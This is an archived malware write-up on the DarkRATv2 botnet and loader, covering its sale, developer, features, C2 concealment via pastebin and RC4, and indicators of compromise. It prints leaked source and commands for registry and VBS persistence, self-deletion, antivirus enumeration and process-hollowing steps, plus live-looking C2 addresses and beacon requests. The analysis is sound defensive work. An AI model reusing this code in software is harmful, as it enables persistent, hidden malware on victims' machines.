{
	"id": "9a095e28-d1a2-42ff-9ab5-e51e70760a41",
	"created_at": "2026-04-06T00:11:32.529486Z",
	"updated_at": "2026-04-10T03:24:18.17756Z",
	"deleted_at": null,
	"sha1_hash": "eb9be9938eee5ca90410ed40086bc036d0b3104f",
	"title": "malware-writeups/DarkRATv2/README.md at master · albertzsigovits/malware-writeups",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2344042,
	"plain_text": "malware-writeups/DarkRATv2/README.md at master ·\r\nalbertzsigovits/malware-writeups\r\nBy albertzsigovits\r\nArchived: 2026-04-05 16:09:13 UTC\r\nDarkRat v2.2.0\r\nTechnical synopsis of a C++ Native HTTP Botnet and Loader\r\nDescription\r\nDarkrat was first found being advertised on HF and is described by the creator as:\r\nDarkrat is designed as a HTTP loader, it is coded in C++ with no dependency, the Current bot is\r\ndesign for the Windows API! this means, *DarkRat* has no Cross Platform Support.\r\nThis HTTP loader - in reality - acts more like a bot controller.\r\nDisclaimer\r\nThe developer also puts out a small disclaimer in order to avoid potential litigation:\r\nThis is often seen with other RATs.\r\nI, the creator, am not responsible for any actions, and or damages, caused by this software.\r\nYou bear the full responsibility of your actions and acknowledge that this software was created for educational\r\nThis software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the ri\r\nBy using this software, you automatically agree to the above.\r\nCopyright (c) 2017-2019 DarkSpider\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated doc\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 1 of 50\n\nThen my question is: why is it only advertised on underground cybercrime forums?\r\nThe developer\r\nThe dev uses the moniker Darkspider on both HF and both in the compiled executables pdb path.\r\nCrawling through Darkspider's posts on HF, there seems to be some clue to his german/austrian/swiss origin:\r\nThe dev is also present on Discord and has a channel where he 
announced milestones regarding his RAT:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 2 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 3 of 50\n\nPricing, forums, seller\r\nDarkspider offers 3 packages that customers can potentially choose from:\r\nBasic/GOLD: unlimited\r\nSource Version: There is unfortunately only two version available because I can not give any\r\ndevelopment support (8/10 SOLD)\r\nPrivate Versions: On Request\r\nThe dev also sells source versions which means DarkRatv2 is potentially being re-selled by other individuals too.\r\nRelation to other families\r\nInteresting enough to note that the main description of DarkRAT is basically a copy-paste of AbSent-Loader's\r\ndescription. As we will see with the inner workings, clearly, the developer took a lot of ideas and inspiration from\r\nboth:\r\nhttps://github.com/Tlgyt/AbSent-Loader\r\nhttps://github.com/zettabithf/LiteHTTP\r\nJust recently, a new Botnet was also announced on HF: it has unmistakable ties to DarkRATv2. 
I will try to keep\r\ntrack all of the different 'forks' of DarRAT, since it's really favored in cybercrime rings:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 4 of 50\n\nHere's a customized DarkRATv2 panel, called GRS:\r\nAdditional documentation:\r\nThe developer maintains a DarkRAT manual on:\r\nhttp://darktools.me/docs/\r\nhttp://wsyl2u7uvfml6p7p.onion/docs/\r\nAlso it's possible to gain additional insights into the workings of the panel by browsing to README.md on a C2\r\nserver:\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 5 of 50\n\nFeatures\r\nPanel\r\nTemplate System based on Smarty\r\nDynamic URL Routing\r\nMulti User Support\r\nPlugin System\r\nStatistics of Bots \u0026 online rates\r\nAdvanced Bot Informations\r\nTask Tracking\r\nTask Geo Targeting System\r\nTask Software Targeting System (for .net software)\r\nBot 2.2.0\r\nRunning Persistence\r\nStartup Persistence\r\nInstalled hidden on the FileSystem\r\nDownload \u0026 Execute\r\nUpdate\r\nUninstall\r\nCustom DLL Loading\r\nDirect Connect or RAW forwarder (Like pastebin/gist also supported own plain/raw sites)\r\nAV detection\r\nIncluded Plugins\r\nBotshop with autobuy Bitcoin API\r\nAlpha version of a DDOS (NOT STABLE)\r\nExamples\r\nFunctionalities\r\nExecution flow\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 6 of 50\n\nRunning Persistance\r\nCommand: cmd.exe /k start %APPDATA%\\Microsoft\\Windows\\00jXHoowyD.vbs:\r\nDo\r\nsComputerName = \".\"\r\nSet objWMIService = GetObject(\"winmgmts:\\\\\" \u0026 sComputerName \u0026 \"\\root\\cimv2\")\r\nsQuery = \"SELECT * FROM Win32_Process\"\r\nSet objItems = objWMIService.ExecQuery(sQuery)\r\nDim found\r\nfound = \"false\"\r\nFor Each objItem In objItems\r\nIf objItem.Name = \"00jXHoowyD.exe\" Then\r\nfound = \"true\"\r\nEnd If\r\nNext\r\nIf found = \"false\" Then\r\nDim objShell\r\nSet objShell = 
WScript.CreateObject(\"WScript.Shell\")\r\nobjShell.Run(\"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\00jXHoowyD.exe \u003e Nul \")\r\nSet objShell = Nothing\r\nEnd If\r\nWScript.Sleep 1000\r\nLoop\r\nThe vbs file provides periodic checks to ascertain whether the process is running in the background or not.\r\nStartup Persistance\r\nAPI: RegSetValueExA\r\nKey: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinSystem32\r\nValue: C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\00jXHoowyD.exe\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 7 of 50\n\nTries to be shady by calling itself WinSystem32.\r\nThe Run key points to the following location on the file system.\r\nLeaked source:\r\nvoid addstartup()\r\n{\r\nTCHAR path[100];\r\nGetModuleFileName(NULL, path, 100);\r\nHKEY newValue;\r\nRegOpenKey(HKEY_CURRENT_USER, \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", \u0026newValue\r\nRegSetValueEx(newValue, \"System32\", 0, REG_SZ, (LPBYTE)path, sizeof(path));\r\nRegCloseKey(newValue);\r\n}\r\nInstalled hidden on the FileSystem\r\n\\AppData\\Roaming\\Microsoft\\Windows\\00jXHoowyD.exe\r\nor\r\n\\AppData\\Roaming\\WinBootSystem\\WinBootSystem.exe\r\nBeing hidden means the executable is just put into %APPDATA% under the Windows folder.\r\nUninstall\r\ncmd.exe /C ping 127.0.0.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"%s\"\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 8 of 50\n\nLeaked source:\r\nvoid uninstall() {\r\nremoveRegInstallKey();\r\nstd::string remove = \" /C \\\"PING.EXE -n 5 127.0.0.1 \u0026\u0026 del \" + ExePath() + \"\\\"\";\r\nShellExecute(\r\nNULL,\r\n_T(\"open\"),\r\n_T(\"cmd\"),\r\n_T(remove.c_str()), // params\r\n_T(\" C:\\ \"),\r\nSW_HIDE);\r\n}\r\nAV Detection\r\nwmi with WQL Select * From AntiVirusProduct via 
root\\SecurityCenter2\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 9 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 10 of 50\n\nLeaked source code:\r\nstd::string getCurrentAv() {\r\nstd::string returnString;\r\nCoInitializeEx(0, 0);\r\nCoInitializeSecurity(0, -1, 0, 0, 0, 3, 0, 0, 0);\r\nIWbemLocator* locator = 0;\r\nCoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)\u0026 loca\r\nIWbemServices* services = 0;\r\nwchar_t* name = L\"root\\\\SecurityCenter2\";\r\nif (SUCCEEDED(locator-\u003eConnectServer(name, 0, 0, 0, 0, 0, 0, \u0026services))) {\r\n//printf(\"Connected!\\n\");\r\n//Lets get system information\r\nCoSetProxyBlanket(services, 10, 0, 0, 3, 3, 0, 0);\r\nwchar_t* query = L\"Select * From AntiVirusProduct\";\r\nIEnumWbemClassObject* e = 0;\r\nif (SUCCEEDED(services-\u003eExecQuery(L\"WQL\", query, WBEM_FLAG_FORWARD_ONLY, 0, \u0026e))) {\r\n//printf(\"Query executed successfuly!\\n\");\r\nIWbemClassObject* object = 0;\r\nULONG u = 0;\r\n//lets enumerate all data from this table\r\nstd::string antiVirus;\r\nwhile (e) {\r\ne-\u003eNext(WBEM_INFINITE, 1, \u0026object, \u0026u);\r\nif (!u) break;//no more data,end enumeration\r\nCComVariant cvtVersion;\r\nobject-\u003eGet(L\"displayName\", 0, \u0026cvtVersion, 0, 0);\r\n//std::wcout \u003c\u003c cvtVersion.bstrVal;\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 11 of 50\n\nreturnString = bstr_to_str(cvtVersion.bstrVal);\r\n}\r\n}\r\nelse\r\nprintf(\"Error executing query!\\n\");\r\n}\r\nelse\r\nprintf(\"Connection error!\\n\");\r\n//Close all used data\r\nservices-\u003eRelease();\r\nlocator-\u003eRelease();\r\nCoUninitialize();\r\nreturn returnString;\r\n}\r\nMutex\r\nAPI: CreateMutexA\r\nValue: Local\\3mCUq1z\r\nThe mutex value is hardcoded and is different between samples. 
The call to CreateMutex returns a handle to the mutex, '3mCUq1z' in this case.\r\nNext, GetLastError is called to determine whether the handle points to a mutex that already existed.\r\nThen the code compares the return value of GetLastError to the hex value 0xB7, which is the value of the symbolic constant ERROR_ALREADY_EXISTS.\r\nIf the mutex already exists, it won't re-infect the system.\r\nLeaked source:\r\n//Check if the Bot is Running\r\nCreateMutexA(0, FALSE, \"Local\\\\$myprogram$\"); // try to create a named mutex\r\nif (GetLastError() == ERROR_ALREADY_EXISTS) // did the mutex already exist?\r\nreturn -1; // quit; mutex is released automatically\r\nCustom DLL Loading\r\n1. CreateProcessA - dwCreationFlags 4 - CREATE_SUSPENDED\r\n2. VirtualAlloc\r\n3. GetThreadContext\r\n4. ReadProcessMemory\r\n5. GetModuleHandleA - NtUnmapViewOfSection\r\n6. GetProcAddress - ntdll.dll\r\n7. VirtualAllocEx\r\n8. WriteProcessMemory\r\n9. SetThreadContext\r\n10. ResumeThread\r\n11. VirtualFree\r\nThis method is known as process hollowing. Malware can unmap or hollow out code from the memory of a process and overwrite the same memory space of the process with malicious code. First, the malware needs to create a new process in suspended mode (CreationFlags 4).\r\nNext, the malware swaps out the contents of the benign file with the malicious code. This is where the call to NtUnmapViewOfSection comes into the picture: it is resolved dynamically from ntdll.dll and used to unmap the memory of the target process.\r\nNow that the memory is unmapped, VirtualAllocEx is called to allocate new memory for the malware, and WriteProcessMemory is used to write each of the malware's sections into the target process memory space. The malware also calls SetThreadContext to point the entry point to the new code section.\r\nAs a last step, the malware resumes the suspended thread by calling ResumeThread, so that the process continues with the newly allocated malicious code.\r\nAnti-debugging techniques\r\nAnti-error technique\r\nDarkRATv2 disables Windows error notifications right at the start of the program.\r\nAPI: SetErrorMode\r\nValue: 0x8007\r\nSEM_FAILCRITICALERRORS\r\nSEM_NOALIGNMENTFAULTEXCEPT\r\nSEM_NOOPENFILEERRORBOX\r\nSEM_NOGPFAULTERRORBOX\r\nLeaked source code\r\nAn early version of the final Botnet was leaked through the following GitHub repo:\r\nhttps://github.com/Tlgyt/The-Collection/blob/master/Source%20Codes/Botnets/DarkRat%20Loader/derkrut/main.cpp\r\nThe developer desperately tried to get rid of the leaked source by submitting a dispute through GitHub:\r\nAlso discloses his Discord account:\r\nOther references\r\nLeveraging a bit of OSINT, it is also clear that the developer had used lots of resources from LiteHTTP Botnet. 
It's clearly a trend: up-and-coming malware devs take an existing malware family as a recipe, add a few modifications here and there, and release the new iteration as a completely new 'product':\r\nhttps://github.com/darkspiderbots/AbSent-Loader/commit/d8e623c682fce9382d771af46463eae7504bc059\r\nhttps://github.com/darkspiderbots/LiteHTTP/commit/2a29698bba64ef1abb98997e9100240dfe37d841\r\nhttps://github.com/darkspiderbots/LiteHTTP/commit/bf970261e8619d11095102007fb1ef77b2b84c93\r\nCryptography\r\nThere's a distinct string in the disassembly of the builder:\r\nIt is also found in the following project, hCrypt, which is an AES-encrypted PE loader:\r\nhttps://github.com/Include-sys/hCrypt/blob/master/Stub/main.cpp\r\n#include \u003cfstream\u003e\r\n#include \"VirtualAES\\VirtualAES.h\"\r\n#include \u003cWindows.h\u003e\r\n#include \u003cTlHelp32.h\u003e\r\n/*\r\n* AES Encrypted and AntiVM PE Loader (Crypter Stub)\r\n*\r\n* https://www.github.com/Include-sys/hCrypt\r\n*\r\n* Coded by Include-sys for Educational Purposes\r\n*/\r\n/* Virtual Machine Detection Functions */\r\n/* AES-256 Bit Decryption Function */\r\nvoid AESDecrypt(char* toDecrypt, int size)\r\n{\r\n//Explanation exist in Builder\r\nunsigned char key[KEY_256] = \"S#q-}=6{)BuEV[GDeZy\u003e~M5D/P\u0026Q}6\u003e\";\r\nunsigned char ciphertext[BLOCK_SIZE];\r\nunsigned char decrypted[BLOCK_SIZE];\r\naes_ctx_t* ctx;\r\nvirtualAES::initialize();\r\nctx = virtualAES::allocatectx(key, sizeof(key));\r\nPanel\r\nLogin\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 21 of 
50\n\nDashboard\r\nTasks\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 22 of 50\n\nBots\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 23 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 24 of 50\n\nSettings\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 25 of 50\n\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 26 of 50\n\nroutes\r\nPlugins\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 27 of 50\n\nPanel source\r\n../.git/HEAD ref: refs/heads/master\r\n../.git/refs/heads/master d53a9090693032825b8a4401e4975e0ffa1d55a5\r\n../.git/config\r\n[core]\r\nrepositoryformatversion = 0\r\nfilemode = true\r\nbare = false\r\nlogallrefupdates = true\r\n[remote \"origin\"]\r\nurl = https://github.com/darkspiderbots/darkratPanel.git\r\nfetch = +refs/heads/*:refs/remotes/origin/*\r\n[branch \"master\"]\r\nremote = origin\r\nmerge = refs/heads/master\r\nSource filelist\r\n../.git/index\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 28 of 50\n\n.htaccess\r\nREADME.md\r\nfavicon.ico\r\nindex.php\r\nrobots.txt\r\nversions/2.0/composer.json\r\nversions/2.0/index.php\r\nversions/2.0/plugins/about/Controller/aboutConroller.class.php\r\nversions/2.0/plugins/about/about.php\r\nversions/2.0/plugins/about/assets/nav/about.svg\r\nversions/2.0/plugins/about/template/about/about.tpl\r\nversions/2.0/plugins/custom_urls/Controller/routes.class.php\r\nversions/2.0/plugins/custom_urls/custom_urls.php\r\nversions/2.0/plugins/custom_urls/custom_urls.sql\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 29 of 
50\n\nversions/2.0/plugins/custom_urls/template/settings/options.tpl\r\nversions/2.0/plugins/ddos/Controller/ddosController.class.php\r\nversions/2.0/plugins/ddos/Controller/ddosHandlerController.php\r\nversions/2.0/plugins/ddos/ddos.php\r\nversions/2.0/plugins/ddos/ddos.sql\r\nversions/2.0/plugins/ddos/dll/ddoshandle.dll\r\nversions/2.0/plugins/ddos/template/ddos/ddoshub.tpl\r\nversions/2.0/plugins/ddos/template/ddos/ddosinfo.tpl\r\nversions/2.0/plugins/example_task_extension/dll/example.dll\r\nversions/2.0/plugins/example_task_extension/example_task_extension.php\r\nversions/2.0/plugins/extreme_onion_routing/Controller/Ajax.class.php\r\nversions/2.0/plugins/extreme_onion_routing/Controller/Backend.class.php\r\nversions/2.0/plugins/extreme_onion_routing/Cron/checkServer.php\r\nversions/2.0/plugins/extreme_onion_routing/extreme_onion_routing.php\r\nversions/2.0/plugins/extreme_onion_routing/extreme_onion_routing.sql\r\nversions/2.0/plugins/extreme_onion_routing/template/Backend/extreme_onion_routing.tpl\r\nversions/2.0/plugins/extreme_onion_routing/template/Backend/manage_gates.tpl\r\nversions/2.0/plugins/extreme_onion_routing/template/Backend/manage_routers.tpl\r\nversions/2.0/plugins/logs/Controller/logController.class.php\r\nversions/2.0/plugins/logs/assets/nav/logs.svg\r\nversions/2.0/plugins/logs/logs.php\r\nversions/2.0/plugins/logs/logs.sql\r\nversions/2.0/plugins/logs/template/log/loginfo.tpl\r\nversions/2.0/plugins/logs/template/log/logs.tpl\r\nversions/2.0/plugins/miner/Controller/miner.class.php\r\nversions/2.0/plugins/miner/dll/Monero_cpu.dll\r\nversions/2.0/plugins/miner/miner.php\r\nversions/2.0/plugins/miner/template/miner/settings.tpl\r\nversions/2.0/plugins/stealer/Controller/PassMain.class.php\r\nversions/2.0/plugins/stealer/Controller/Recovery.class.php\r\nversions/2.0/plugins/stealer/dll/Stealer.dll\r\nversions/2.0/plugins/stealer/stealer.php\r\nversions/2.0/plugins/stealer/stealer.sql\r\nversions/2.0/plugins/stealer/template/passmain/cookiemanag
er.tpl\r\nversions/2.0/plugins/stealer/template/passmain/passrecovery.tpl\r\nversions/2.0/vendor/autoload.php\r\n...\r\nFull list: https://pastebin.com/A3WYH5C5\r\nC2 communication\r\n#1 Pastebin grab\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 30 of 50\n\nGET /raw/J7vpbEz6 HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gec\r\nHost: pastebin.com\r\n#2 Bot check-in request\r\nPOST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: SUq1rx\r\nHost: 37.44.215.132\r\nContent-Length: 656\r\nrequest=YUhkcFpEMHhOR0V6T0RKbE1TMDBZVEl3TFRWbU4yTXRZak5pTkMwMllXRmtOVEl3TW1Fd01XVW1ZMjl0Y0hWMFpYSnVZV\r\n#3 Admin login page\r\nPOST /login HTTP/1.1\r\nHost: advcash.network\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:99.0) Gecko/20100101 Firefox/99.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 31 of 50\n\nReferer: http://advcash.network/login\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\nCookie: PHPSESSID=abcdefghijklmnopq012345678\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nuserid=USER\u0026pswrd=PASSWORD\r\nHiding C2 addresses\r\nInitially the C2 server address is hidden from your eyes. The developer had implemented a layered approach into\r\nhow a certain sample is deciding which C2 server it connects to.\r\n1. There's a pastebin link in plain text embedded in the sample\r\n2. There's also a decryption key in plain text in the sample\r\n3. Sample gets pastebin link, content is generally a base64 encoded string\r\n4. Decoding the base64 string reveals a binary blob\r\n5. 
Then the binary blob gets decrypted with the initial key and then the plain-text is the C2 address\r\nPastebin and key relations\r\nIndicators of Compromise\r\nDarkRatv2 versions\r\n1.1.0\r\n2.0.1\r\n2.1.3\r\n2.2.0\r\nPhpmyadmin versions\r\n4.5.4.1\r\n4.6.6deb5\r\nGit repository\r\nhttps://github.com/darkspiderbots/darkratPanel.git\r\nDev pastebin\r\nhttps://pastebin.com/u/darkspiderbots\r\nDeveloper contacts\r\nXMPP: darkspider@xmpp.jp\r\nEmail: darkspiderbots@protonmail.com\r\nEmail: darkspider@exploit.im\r\nGithub: github.com/darkspiderbots\r\nSite: darktools.me\r\nSite: darktools.pro\r\nDarkRATv2 builder\r\nSHA256: 27396fe2ff38df7e3b9d67c1112ea6cd7ede1a8e56507cca5aa0a446eb7f4143\r\nPDB: 
C:\\Users\\darkspider\\Desktop\\DarkRatCoding\\darkrat\\bot\\Release\\Builder.pdb\r\nLicense file: darkrat.lic\r\nGate settings: config.json\r\nPanel package: Panel.zip\r\nBuilder settings\r\nek = Encryption key\r\npu = Pastebin URL or Direct Encrypted URL\r\nmux = Mutex\r\nsup = Startup true/false\r\nri = Request Interval in seconds\r\npre = Running persistance true/false\r\nst = Spread tag\r\nua = User-Agent\r\npn = Some Example for DarkRat Developers\r\n{\r\n\"ek\": \"randomkey\",\r\n\"pu\": \"http://pastebin.com/raw/randomuri\",\r\n\"mux\": \"randommutex\",\r\n\"sup\": \"false\",\r\n\"ri\": \"5\",\r\n\"pre\": \"false\",\r\n\"st\": \"main\",\r\n\"ua\": \"randomua\",\r\n\"pn\": { \"FOO\":\"BAR\"}\r\n}\r\nITW and payloads\r\nC2 servers\r\nC2 server resources\r\n../.git\r\n../bots\r\n../dashboard\r\n../ddos\r\n../edituser/1\r\n../login\r\n../phpmyadmin\r\n../request\r\n../settings\r\n../stealer\r\n../tasks\r\n../versions/2.0/plugins/stealer/stealer.sql\r\n../versions/2.0/plugins/hvnc/dll/hvnc.dll\r\n../versions/2.0/templates/v2/install/index.tpl\r\nPlugins\r\ncustom_urls\r\nddos\r\nhvnc\r\nminer\r\nstealer\r\nC2 beacon parameters (before double base64 encoding)\r\nhwid=12a345b6-1a23-1a2b-a1b2-1abc2345d67e\r\n\u0026computername=TEST-PC\r\n\u0026aornot=true\r\n\u0026installedRam=2.000000\r\n\u0026netFramework2=true\r\n\u0026netFramework3=true\r\n\u0026netFramework35=true\r\n\u0026netFramework4=true\r\n\u0026antivirus=\r\n\u0026botversion=2.1.3\r\n\u0026gpuName=todo\r\n\u0026cpuName=Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz\r\n\u0026arch=x64\r\n\u0026operingsystem=Windows 7 Service Pack 1\r\n\u0026spreadtag=main\r\nHardcoded User-Agents\r\nHardcoded Mutexes\r\nSuspicious API calls\r\nCheckRemoteDebuggerPresent\r\nCreateProcess\r\nCreateThread\r\nCreateToolhelp32Snapshot\r\nGetCurrentProcess\r\nGetProcAddress\r\nGetThreadContext\r\nGetTickCount\r\nGetModuleHandle\r\nIsDebuggerPresent\r\nLoadLibrary\r\nNtUnmapViewOfSection\r\nOpenProcess\r\nProcess32First\r\nProcess32Next\r\nReadProcessMemory\r\nResumeThread\r\nSetThreadContext\r\nShellExecuteA\r\nURLOpenBlockingStreamA\r\nVirtualAlloc\r\nVirtualFree\r\nVirtualProtect\r\nWriteProcessMemory\r\nPDBs\r\nPastebins\r\nRC4 Encryption keys\r\nPastebin 
responses\r\n2.0.1;http://35.204.135.202/update.zip\r\n2.1.3;http://35.204.135.202/update.zip\r\n4x+9ZolpV9+wS1xxlSmTQfPTglBPsSCsMhq3ceGt\r\ngh3nhIKYFaODSrZHXDnzSpo5a6uR1FkMSIpy5g==\r\nP0W0jVz9V+mZHlZn8hdG7StZ0IRo18Mi8gwrLWQ=\r\nOzE7OWprZGp9e3djcWF4YnxlYHF6NzY0OiwjMA==\r\n8GWOsCTVGdIXE7TlkX0A+50WXcdEfzHdbTSWVNr5\r\nXMtmuwemloM7PN8+9lgqowiS7Q36UkY3RthKWg==\r\nEQKv4vx/Q0GD9AjrLI+LrnXEfUVrs+52mPHvY4VaPHnt+A1TGg==\r\nAWtxLpEyiaQQitH0C4cvlXddVtquBWulwyOAAaUM\r\n89xoOk5h6JAJbplpn0plrlRI+a0pK9mEedupppY=\r\n2SN57pHzmmAc6WhkQPy/OEicdpjdkrG2IhXZyRditw==\r\n2SN57pHzmjZLsyM2HaniaVPdKcaD06b8IQXNzwY=\r\n2SN57pHzmjNIqjwzAqz/fl/GN4bRjaH8IwQ=\r\nP9qpEUWRPpy/X1nMoQCI5p4Y01fWcD26WPkA==\r\nIw+s940h3m8Zjd7mcnammzxV4+XZOn2RM0uZZV6H\r\n#7%;y~d.8(1\u003e8,7?'89\u00262?;�,\"~9\u0026 \u003e\u0026\"?\r\n#%7;kld7(.?6e2,\u0026~1. 6.\"7\r\nhc7BzjmDmm4+ROP4fF6rlDp0bz3d3oAxLWv+AiU=\r\ndk7D50YwGDUIzVlxfIMv7MvHyMSx+hhPr1YIiQ4=\r\nysXaSHDTtL90P60xvENuELmkmwVIWHQuwWTc\r\nTLBLz7KVoeC0IMTHvwY+Fnt1gzghy0P4jUbMyOI=\r\nZjfaMpfAyNn7Brw0ajZOqR71gAbEUeZ87uNDzT6BUzk9hjVruTGFwKgi\r\nk7HkixO7LqFlu4dlJtAiUFAL7jl4xLXyfh7Fyj0=\r\ntATvtchuYALVBVr+LkH4wKsKpGjIP42OplF0MZrXL+uIpQFNQA==\r\n5MWttHDEgA6/IK4iQFngwpmSeisqgJqWGH0sV0k=\r\niZ0rCLOxPeo1t7bR9X2OFUmqXd+6SxDGRsW5Wg==\r\nyQSaXNknA8x40o9QZjAM28BKOmm7gP5jlbYi7g==\r\nt8gca6tBA2QfGrZgaKcE/CLSmY6QId3MGeGLU4w=\r\nprCtUtZ/lz5V8auJmiRIQjCz60v2l6hz1ei7vzKM5TCyYw==\r\nm93fZdUWpDO95QSK6VEGFUUT/XFQHhWe/tSj4g==\r\nkeRwrh9WFcFmQWyJNMSKvR5ROys5oFT0QSbi88w=\r\n9jeIQeCYYPMLCZMpaXSM8x9D3reSZd+VDuE8+pgC\r\nt8gca6tBAzJIS/onN+df43yZ3JXRa97cDeea\r\nwGRmv2tlFuI1ZrqQzqeuVNMGLcF7ltc=\r\nScripts\r\n# RC4 decryptor (Python 3)\r\n# Save the raw paste to a file named after its ID; the decrypted bytes are written to the same name with .clean appended.\r\npastebin = '3CC2ryd2'\r\nkey = b'DE4E24E3E9DEF1F54C1816AC26C18'\r\n\r\ndef rc4(key, data):\r\n    # Key-scheduling algorithm: permute S under the key bytes\r\n    S = list(range(256))\r\n    j = 0\r\n    for i in range(256):\r\n        j = (j + S[i] + key[i % len(key)]) % 256\r\n        S[i], S[j] = S[j], S[i]\r\n    # Pseudo-random generation: XOR every input byte with the next keystream byte\r\n    out = bytearray()\r\n    i = j = 0\r\n    for byte in data:\r\n        i = (i + 1) % 256\r\n        j = (j + S[i]) % 256\r\n        S[i], S[j] = S[j], S[i]\r\n        out.append(byte ^ S[(S[i] + S[j]) % 256])\r\n    return bytes(out)\r\n\r\nwith open(pastebin, 'rb') as pb:\r\n    data = pb.read()\r\nwith open(pastebin + '.clean', 'wb') as decrypted:\r\n    decrypted.write(rc4(key, data))\r\nSandbox links\r\nhttps://hybrid-analysis.com/sample/1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b9637c92cd07814\r\nhttps://hybrid-analysis.com/sample/8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5472bee692f\r\nhttps://app.any.run/tasks/1f4898f6-f168-45f6-9cde-f4fc3108f6d6/\r\nhttps://app.any.run/tasks/4a2be20e-5b9b-4dce-bcbb-6654ccf7458d/\r\nhttps://app.any.run/tasks/76a61009-b93c-404f-b9dd-c5d211c2456b/\r\nhttps://app.any.run/tasks/abe2a17b-7d35-4e68-811d-945f5fa58d7c/\r\nhttps://app.any.run/tasks/cdcc07a8-4bb7-4db2-b14f-e0559273c71f/\r\nhttps://app.any.run/tasks/aab8736c-8dc5-4ad0-ba70-5b15c568a47d/\r\nhttps://app.any.run/tasks/205d250e-d807-48aa-943b-922d11b1212b/\r\nhttps://cape.contextis.com/analysis/84762/\r\nhttps://cape.contextis.com/analysis/84812/\r\nhttps://cape.contextis.com/analysis/85291/\r\nOther ASCII strings\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\r\n2.1.3 (2.2.0)\r\ncmd.exe\r\nwscript.exe\r\nStartup failed, error:\r\nRequest failed, error:\r\ncmd.exe /C 127.0.0.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"%s\"\r\nSOFTWARE\\Microsoft\\Cryptography\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v2.0.50727\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v3.0\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v3.5\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v4\r\nSOFTWARE\\Microsoft\\Cryptography\r\nMachineGuid\r\nWindows\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\r\nWinSystem32\r\nNtUnmapViewOfSection\r\nIsWow64Process\r\ncmd.exe /k start\r\n\\Microsoft\\Windows\\\r\nAPPDATA\r\n.exe\r\n/C start\r\nC:\r\nkillpersistence\r\nPOST\r\nrequest=\r\nContent-Type: application/x-www-form-urlencoded\r\ntext/plain\r\n\u0026taskid=\r\n\u0026taskstatus=\r\nMozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko)\r\nVersion/5.1 